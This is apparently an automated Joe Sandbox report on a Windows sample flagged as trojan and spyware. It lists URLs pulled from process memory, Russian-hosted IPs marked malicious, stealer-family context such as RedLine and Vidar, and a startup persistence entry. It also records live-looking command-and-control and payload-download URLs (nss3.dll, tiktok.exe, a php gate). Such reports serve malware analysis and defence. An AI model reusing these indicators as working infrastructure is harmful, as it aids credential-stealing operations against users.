https://snapshot.monitor.azure.com/X	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000D.00000002.2980273016.0000000002411000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp	false		high
https://rt.services.visualstudio.com/Ptr	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dc.services.visualstudio.com/X	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rt.services.visualstudio.com/p	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.monitor.azure.com/Ptr	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp	false		high
https://pastebin.com/raw/z9pYkqPQPO	MSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/p	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000003.00000002.1994802884.0000000003DD9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.0000000003979000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u5qk.3.exe, 00000009.00000003.2489838469.00000000027F4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
http://185.172.128.76	u5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://dejavu.sourceforge.net/wiki/index.php/License	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/nss3.dllg	u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://scripts.sil.org/OFLThis	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://scripts.sil.org/OFLins	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3020284753.0000020EE90C5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&z	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://github.com/itfoundry/Poppins)	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E803E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/itfoundry/Poppins)&&&&v	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://github.com/itfoundry/Poppins)5	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll2	u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.iolo.com/company/legal/eula/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://185.172.128.76/15f649199f40275b/softokn3.dllS	u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com	VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	false		high
https://dc.services.visualstudio.com/v2/track	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codeplex.com/prism	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://taskscheduler.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.php9bc63c5c878de6304643d64e61fb8releaseccbd010d5db7d1a32561c9	u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmp	false		high
http://compositewpf.codeplex.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76Z	u5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432419
Start date and time:	2024-04-27 01:30:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VucRf0jboS.exe renamed because original name is a hash value
Original Sample Name:	5cd97a765e0c9463f57769117db519fa.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 113 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.165.165.26, 104.102.251.89, 104.102.251.57, 13.95.31.18, 192.229.211.108, 20.242.39.171, 20.190.152.19, 40.126.24.149, 40.126.24.148, 20.190.152.22, 40.126.24.147, 20.190.152.21, 40.126.24.84, 40.126.24.83, 52.182.143.212, 52.168.117.173, 23.51.58.94, 20.9.155.150
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: VucRf0jboS.exe

Simulations

Behavior and APIs

Time	Type	Description
00:31:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
01:32:12	API Interceptor	2x Sleep call for process: WerFault.exe modified
01:32:13	API Interceptor	1679x Sleep call for process: MSBuild.exe modified
01:32:14	API Interceptor	1x Sleep call for process: cmd.exe modified
01:32:31	API Interceptor	7x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
01:33:07	API Interceptor	8x Sleep call for process: FBAKEHIEBK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
185.172.128.228	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
iolo0.b-cdn.net	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.100
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.193
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	156.146.43.65
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	195.181.163.195
